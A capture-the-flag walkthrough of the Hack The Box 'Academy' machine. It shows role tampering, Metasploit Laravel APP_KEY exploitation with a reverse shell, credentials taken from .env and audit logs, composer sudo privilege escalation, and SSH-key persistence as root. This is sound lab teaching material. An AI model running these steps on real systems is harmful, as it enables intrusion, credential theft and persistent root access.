Lluna's Pure land.

What is life like when singing to wine?


HTB-[academy]

0x00. Overview

0x01. Information gathering

The scan shows ports 22 and 80 open, the hostname academy.htb, and the service versions (OpenSSH 8.2p1 and Apache 2.4.41 on Ubuntu).

root@JIYE:~/htb/academy# nmap -sC -sV -sT 10.10.10.215 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-09 01:02 EST
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.43 seconds
root@JIYE:~/htb/academy#

0x02. Visiting port 80

First add a hosts entry [10.10.10.215 academy.htb]. The site has a login form and a registration form.

Register an account, log in and browse the site manually; nothing useful turns up.

0x03. Directory enumeration (403/404 filtered out)

Fuzz for PHP pages with wfuzz.

The following pages are found:

config

admin

index

home

login

register

root@JIYE:~/htb/academy# wfuzz -u http://academy.htb/FUZZ.php -w /usr/share/wordlists/dirb/small.txt --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://academy.htb/FUZZ.php
Total requests: 959
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000213: 200 0 L 0 W 0 Ch "config"
000000059: 200 141 L 227 W 2633 Ch "admin"
000000434: 200 76 L 131 W 2117 Ch "index"
000000411: 302 1049 L 4114 W 55034 Ch "home"
000000498: 200 141 L 226 W 2627 Ch "login"
000000684: 200 148 L 247 W 3003 Ch "register"
Total time: 9.694324
Processed Requests: 959
Filtered Requests: 953
Requests/sec.: 98.92385

root@JIYE:~/htb/academy#

0x04. Inspecting the register page source

The registration form carries a hidden field, roleid.

Hidden-field reference 1

Hidden-field reference 2

0x05. Intercepting the request with Burp

Change the value of roleid to 1 in the intercepted registration request before it is forwarded to the backend (the username also needs a 1 appended so that it registers as a new account), then send it; the HTTP status code should be 200. The server stores whatever roleid the client submits, so the new account is created with the admin role.
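To show what the tampered roleid does on the server side, here is an added Python example; it is not the Academy application's code. Only the roleid field is taken from the page: the field names uid, password and confirm, and the meaning of roleid=1 as admin, are assumptions. It contrasts a registration handler that trusts the hidden field with one that assigns the role server-side.

```python
"""Hidden-field tampering in a registration flow (added example, not the Academy app's code).

The register page ships a hidden roleid input. Nothing stops the client from editing it,
so the server must not take the role from the form. Field names uid/password/confirm and
roleid=1 meaning admin are assumptions for this example.
"""
from dataclasses import dataclass

ROLE_USER = 0
ROLE_ADMIN = 1  # assumption: this is what roleid=1 grants on the target


@dataclass
class User:
    username: str
    roleid: int


class UserStore:
    """Stand-in for the users table."""

    def __init__(self) -> None:
        self.users = {}

    def create(self, username: str, roleid: int) -> User:
        if username in self.users:
            # Why the write-up appends a 1 to the username: the first one is already taken
            raise ValueError(f"username already registered: {username}")
        user = User(username, roleid)
        self.users[username] = user
        return user


def tampered_form(username: str) -> dict:
    """Constructed POST body as Burp would forward it after editing the hidden field."""
    return {"uid": username, "password": "Passw0rd!", "confirm": "Passw0rd!", "roleid": "1"}


def register_vulnerable(store: UserStore, form: dict) -> User:
    """Trusts every submitted field, hidden ones included (mass assignment)."""
    return store.create(form["uid"], int(form.get("roleid", ROLE_USER)))


def register_fixed(store: UserStore, form: dict) -> User:
    """Role is a server-side decision; whatever the client sent in roleid is ignored."""
    return store.create(form["uid"], ROLE_USER)


def can_access_admin(user: User) -> bool:
    return user.roleid == ROLE_ADMIN


if __name__ == "__main__":
    store = UserStore()
    print("vulnerable:", register_vulnerable(store, tampered_form("demo1")))
    print("fixed:     ", register_fixed(store, tampered_form("demo2")))
```

The fix is not to validate roleid better but to stop reading it from the request at all; a hidden input is client-controlled data like any other.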

0x06. Visiting the admin page

1. Log in as demo1

2. Login succeeds

The admin panel shows a pending item about fixing issues with dev-staging-01.academy.htb, and two user names:

cry0l1t3

mrb3n

3. Visit dev-staging-01.academy.htb (a hosts entry is needed)

The page leaks sensitive server information, including the application's environment with the APP_KEY used below; the application is Laravel.

0x07. Google for a Laravel exploit

There is a Metasploit module for it. The module needs the APP_KEY: Laravel encrypts its tokens with that key, and the module forges an encrypted X-XSRF-TOKEN header that the application decrypts and then unserializes, so a leaked key turns into remote command execution.
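Added example (not the Metasploit module's code and not Laravel's): the MAC check Laravel performs on an encrypted payload before it decrypts and unserializes it, reproduced with the Python standard library. It uses the APP_KEY leaked from the staging host; the ciphertext bytes are a placeholder, since the real module would put an AES-256-CBC encrypted, serialized PHP gadget chain there. The point it demonstrates is that the only thing standing between the request and unserialize() is an HMAC under APP_KEY, so whoever holds the key passes the gate, and rotating the key (php artisan key:generate) invalidates every forged token.

```python
"""Laravel encrypted-payload MAC check and why a leaked APP_KEY defeats it.

Added example, standard library only. The format follows Laravel's Encrypter:
base64( json({"iv": b64(iv), "value": b64(ciphertext),
              "mac": hex(HMAC-SHA256(key, b64(iv) + b64(ciphertext)))}) ).
AES-256-CBC encryption of the serialized value is omitted; the ciphertext is a placeholder.
"""
import base64
import hashlib
import hmac
import json


def load_app_key(env_value: str) -> bytes:
    """APP_KEY in .env looks like 'base64:<key>'; the msf option takes the part after the prefix."""
    prefix = "base64:"
    if not env_value.startswith(prefix):
        raise ValueError("expected a base64: prefixed APP_KEY")
    key = base64.b64decode(env_value[len(prefix):])
    if len(key) != 32:  # AES-256-CBC needs a 32-byte key
        raise ValueError("APP_KEY must decode to 32 bytes")
    return key


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    # Encrypter::hash(): hash_hmac('sha256', $iv.$value, $key), computed over the base64 strings
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def forge_token(key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Build a token that Laravel's MAC check accepts. Anyone holding APP_KEY can do this."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(payload).encode()).decode()


def token_passes_mac(key: bytes, token: str) -> bool:
    """Mirror of the check that runs before decrypt() hands the value to unserialize()."""
    try:
        payload = json.loads(base64.b64decode(token))
    except (ValueError, TypeError):
        return False
    if not isinstance(payload, dict):
        return False
    if not all(isinstance(payload.get(k), str) for k in ("iv", "value", "mac")):
        return False
    expected = laravel_mac(key, payload["iv"], payload["value"])
    return hmac.compare_digest(expected, payload["mac"])


def swap_ciphertext(token: str, new_ciphertext: bytes) -> str:
    """Replace the value without re-signing: all an attacker without APP_KEY can do."""
    payload = json.loads(base64.b64decode(token))
    payload["value"] = base64.b64encode(new_ciphertext).decode()
    return base64.b64encode(json.dumps(payload).encode()).decode()


# APP_KEY value from the box's .env (the same value passed to the msf APP_KEY option)
LEAKED_KEY = load_app_key("base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=")
# A rotated key, derived deterministically here only so the example is reproducible
ROTATED_KEY = hashlib.sha256(b"php artisan key:generate").digest()

# Placeholder: the real module puts an AES-256-CBC encrypted serialized gadget chain here
PLACEHOLDER_CIPHERTEXT = b"<serialized gadget chain, encrypted>"
FORGED = forge_token(LEAKED_KEY, bytes(16), PLACEHOLDER_CIPHERTEXT)

if __name__ == "__main__":
    print("leaked key accepts forged token: ", token_passes_mac(LEAKED_KEY, FORGED))
    print("rotated key accepts forged token:", token_passes_mac(ROTATED_KEY, FORGED))
    print("value swapped without the key:   ", token_passes_mac(LEAKED_KEY, swap_ciphertext(FORGED, b"x")))
```

The remediation on the defending side follows directly: treat a leaked APP_KEY like a leaked password, rotate it, and keep debug pages that dump the environment off anything reachable from the network.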

0x08. Exploiting with msf

root@JIYE:~/htb/academy# msfconsole -q
msf5 >
msf5 > search Laravel
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution

msf5 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf5 exploit(unix/http/laravel_token_unserialize_exec) >
msf5 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
APP_KEY no The base64 encoded APP_KEY string from the .env file
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to target webapp
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
0 Automatic

1. Set the local host

msf5 exploit(unix/http/laravel_token_unserialize_exec) > set lhost tun0
lhost => 10.10.17.216

2. Set the remote host

msf5 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
rhosts => academy.htb

3. Set the APP_KEY (the value leaked by the staging host)

msf5 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
app_key => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

4. Set the virtual host, so the request reaches the staging vhost rather than the main site

msf5 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
vhost => dev-staging-01.academy.htb

5. Run the exploit and get a shell

msf5 exploit(unix/http/laravel_token_unserialize_exec) > options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= no The base64 encoded APP_KEY string from the .env file
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS academy.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to target webapp
VHOST dev-staging-01.academy.htb no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.17.216 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic
msf5 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444
[*] Command shell session 1 opened (10.10.17.216:4444 -> 10.10.10.215:39152) at 2020-12-09 03:07:26 -0500

whoami
www-data
pwd
/var/www/html/htb-academy-dev-01/public
ls
css
favicon.ico
index.php
js
robots.txt
web.config

6. Upgrade to an interactive shell

python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/var/www/html/htb-academy-dev-01/public$
www-data@academy:/var/www/html/htb-academy-dev-01/public$ ls
ls
css favicon.ico index.php js robots.txt web.config
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd ../../
cd ../../

7. Exploring the web root manually turns up a password, mySup3rP4s5w0rd!!, in the production app's .env (DB_PASSWORD)

www-data@academy:/var/www$ pwd
pwd
/var/www/html
www-data@academy:/var/www/html$ ls
ls
academy htb-academy-dev-01 index.php
www-data@academy:/var/www/html$ cd academy
cd academy
www-data@academy:/var/www/html/academy$ ls
ls
app composer.json database public routes tests
artisan composer.lock package.json readme.md server.php vendor
bootstrap config phpunit.xml resources storage webpack.mix.js
www-data@academy:/var/www/html/academy$ ls -la
ls -la
total 280
drwxr-xr-x 12 www-data www-data 4096 Aug 13 12:42 .
drwxr-xr-x 4 root root 4096 Aug 13 12:36 ..
-rw-r--r-- 1 www-data www-data 706 Aug 13 12:42 .env
-rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example
-rw-r--r-- 1 www-data www-data 111 Feb 7 2018 .gitattributes
-rw-r--r-- 1 www-data www-data 155 Feb 7 2018 .gitignore
drwxr-xr-x 6 www-data www-data 4096 Feb 7 2018 app
-rwxr-xr-x 1 www-data www-data 1686 Feb 7 2018 artisan
drwxr-xr-x 3 www-data www-data 4096 Feb 7 2018 bootstrap
-rw-r--r-- 1 www-data www-data 1512 Feb 7 2018 composer.json
-rw-r--r-- 1 www-data www-data 191621 Aug 9 11:57 composer.lock
drwxr-xr-x 2 www-data www-data 4096 Feb 7 2018 config
drwxr-xr-x 5 www-data www-data 4096 Feb 7 2018 database
-rw-r--r-- 1 www-data www-data 1150 Feb 7 2018 package.json
-rw-r--r-- 1 www-data www-data 1040 Feb 7 2018 phpunit.xml
drwxr-xr-x 4 www-data www-data 4096 Nov 9 10:13 public
-rw-r--r-- 1 www-data www-data 3622 Feb 7 2018 readme.md
drwxr-xr-x 5 www-data www-data 4096 Feb 7 2018 resources
drwxr-xr-x 2 www-data www-data 4096 Feb 7 2018 routes
-rw-r--r-- 1 www-data www-data 563 Feb 7 2018 server.php
drwxr-xr-x 5 www-data www-data 4096 Feb 7 2018 storage
drwxr-xr-x 4 www-data www-data 4096 Feb 7 2018 tests
drwxr-xr-x 38 www-data www-data 4096 Aug 9 11:57 vendor
-rw-r--r-- 1 www-data www-data 549 Feb 7 2018 webpack.mix.js
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

8. Trying that password against the local accounts: it works for cry0l1t3 (the database password is reused for the system account)

www-data@academy:/var/www/html/academy$ cd /home
cd /home
www-data@academy:/home$ ls
ls
21y4d ch4p cry0l1t3 egre55 g0blin mrb3n
www-data@academy:/home$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!

$ /bin/bash
/bin/bash
cry0l1t3@academy:/home$

cry0l1t3@academy:/home$ cd ~
cd ~
cry0l1t3@academy:~$ ls
ls
user.txt
cry0l1t3@academy:~$ cat user.txt
cat user.txt
***************************
cry0l1t3@academy:~$

0x09.提权

1. Try sudo -l for privilege escalation, but cry0l1t3 has no sudo rights

cry0l1t3@academy:~$ sudo -l
[sudo] password for cry0l1t3:
Sorry, user cry0l1t3 may not run sudo on academy.
cry0l1t3@academy:~$

2. Review the audit logs

Reference

/var/log/audit is written by auditd (the Linux audit framework), not by SELinux; Ubuntu uses AppArmor. With TTY auditing (pam_tty_audit) enabled, the keystrokes typed into an audited session are logged as type=TTY records with the bytes hex-encoded in the data= field, and that includes passwords typed at an su prompt. Searching the logs for su shows that one user ran it:

cry0l1t3@academy:/var/log/audit$ cat * | grep 'comm="su"'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
cry0l1t3@academy:/var/log/audit$

Decode the hex

Hex: 6D7262336E5F41634064336D79210A

Decoded: mrb3n_Ac@d3my! (the trailing 0A is the Enter key)

Given its content, this is most likely mrb3n's password.
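Added example (not part of the original write-up): a small Python parser for type=TTY audit records, run over a constructed log fragment that contains the record from the box plus two made-up lines (a USER_AUTH record, which must be skipped, and a bash keystroke record) to show what is decoded and what is not.

```python
"""Decode keystrokes recorded by auditd TTY auditing (added example, not from the write-up).

pam_tty_audit stores each keystroke batch as a type=TTY record whose data= field holds
the raw bytes hex-encoded. The first sample line is the record from the box; the other
two are constructed for the example.
"""
import re
import sys

SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_AUTH msg=audit(1597199293.950:85): pid=2520 uid=1002 auid=0 ses=1 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" res=success'
type=TTY msg=audit(1597199300.100:86): tty pid=2531 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
"""

# Only type=TTY lines carry keystrokes; everything else (USER_AUTH, SYSCALL, ...) is skipped
TTY_RE = re.compile(
    r'^type=TTY\b.*?\bpid=(?P<pid>\d+)\s+uid=(?P<uid>\d+)'
    r'.*?\bcomm="(?P<comm>[^"]*)"\s+data=(?P<data>[0-9A-Fa-f]+)\s*$'
)


def decode_tty_records(log_text: str) -> list:
    """Return one dict per TTY record with the hex data turned back into text.

    Control bytes (backspace 0x7F, Ctrl-C 0x03, ...) are kept as-is so that edits
    the user made while typing remain visible to the analyst.
    """
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if not m:
            continue
        raw = bytes.fromhex(m.group("data"))
        records.append({
            "pid": int(m.group("pid")),
            "uid": int(m.group("uid")),
            "comm": m.group("comm"),
            "keystrokes": raw.decode("utf-8", errors="replace"),
        })
    return records


def su_password_candidates(records: list) -> list:
    """Keystrokes typed into su are the password followed by Enter (0x0A)."""
    return [r["keystrokes"].rstrip("\r\n") for r in records if r["comm"] == "su"]


if __name__ == "__main__":
    # Usage on the box: cat /var/log/audit/* | python3 decode_tty.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AUDIT_LOG
    for rec in decode_tty_records(text):
        print(f"pid={rec['pid']} uid={rec['uid']} comm={rec['comm']}: {rec['keystrokes']!r}")
    print("su password candidates:", su_password_candidates(decode_tty_records(text)))
```

Which brings up the defender's caveat: TTY auditing is a keystroke logger, and with the log_passwd option of pam_tty_audit it captures password prompts too, so the audit log has to be protected like a credential store.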

3. Log in as mrb3n

cry0l1t3@academy:/var/log/audit$ su mrb3n
Password:
$ /bin/bash
mrb3n@academy:/var/log/audit$

Check sudo -l for privilege escalation

mrb3n@academy:/var/log/audit$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
mrb3n@academy:/var/log/audit$

4. Privilege escalation through composer

Reference

Running the run-script trick directly did not give root. The reason is visible in the transcript: composer was invoked without sudo, so the script simply ran as mrb3n (whoami confirms it). With sudo composer --working-dir=$TF run-script x the same composer.json spawns the shell as root. The PHP warnings about mysqli.so and pdo_mysql.so are broken extension loading on the box and do not affect the trick.

mrb3n@academy:/var/log/audit$ TF=$(mktemp -d)
mrb3n@academy:/var/log/audit$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/var/log/audit$ composer --working-dir=$TF run-script x
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
> /bin/sh -i 0<&3 1>&3 2>&3
$
$ whoami
mrb3n
$

Alternative route: use the same composer sudo rule to append an SSH public key to /root/.ssh/authorized_keys, then log in as root over SSH.

First generate a key pair with ssh-keygen on the attacking machine.

root@JIYE:~# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:FKBkE5JZ5qaTiSzGFeu24nBc+9uHrMC4EI1Q6/gOXnc root@JIYE
The key's randomart image is:
+---[RSA 3072]----+
| o=B.... |
| .oBoo . |
|. .o+ . |
|+*o= . |
|*+Bo. S |
|o+.=.. |
|+.=o+. E . |
|+=o..o..o . |
| oo +o.. |
+----[SHA256]-----+
root@JIYE:~# cd .ssh/
root@JIYE:~/.ssh# ls
id_rsa id_rsa.pub known_hosts
(the .pub file is the public key)
root@JIYE:~/.ssh# cat id_rsa.pub
ssh-rsa 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 root@JIYE

Then write the composer.json on the target with the public key in the script and run it through sudo. Composer prints "Do not run Composer as root/super user!" but still executes the script as root.

mrb3n@academy:~$ TF=$(mktemp -d)
mrb3n@academy:~$ vim $TF/composer.json
{"scripts":{"SSH":"echo 'ssh-rsa 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' >> /root/.ssh/authorized_keys"}}

mrb3n@academy:~$ sudo composer --working-dir=$TF run-script SSH
[sudo] password for mrb3n:
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> echo 'ssh-rsa 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' >> /root/.ssh/authorized_keys
mrb3n@academy:~$

Connect over SSH with the private key. The first attempt is reset during key exchange; the second succeeds.

root@JIYE:~/.ssh# ssh -i id_rsa root@10.10.10.215
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.10.215 port 22
root@JIYE:~/.ssh# ssh -i id_rsa root@10.10.10.215
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 09 Dec 2020 11:36:12 AM UTC
System load: 0.0
Usage of /: 44.4% of 15.68GB
Memory usage: 21%
Swap usage: 0%
Processes: 178
Users logged in: 1
IPv4 address for ens160: 10.10.10.215
IPv6 address for ens160: dead:beef::250:56ff:feb9:c8a
* Introducing self-healing high availability clustering for MicroK8s!
Super simple, hardened and opinionated Kubernetes for production.

https://microk8s.io/high-availability
0 updates can be installed immediately.
0 of these updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Nov 9 10:11:49 2020
root@academy:~# ls
academy.txt root.txt snap
root@academy:~# cat root.txt
********************
root@academy:~#
------------- The page is short but the affection is long; see you next time -------------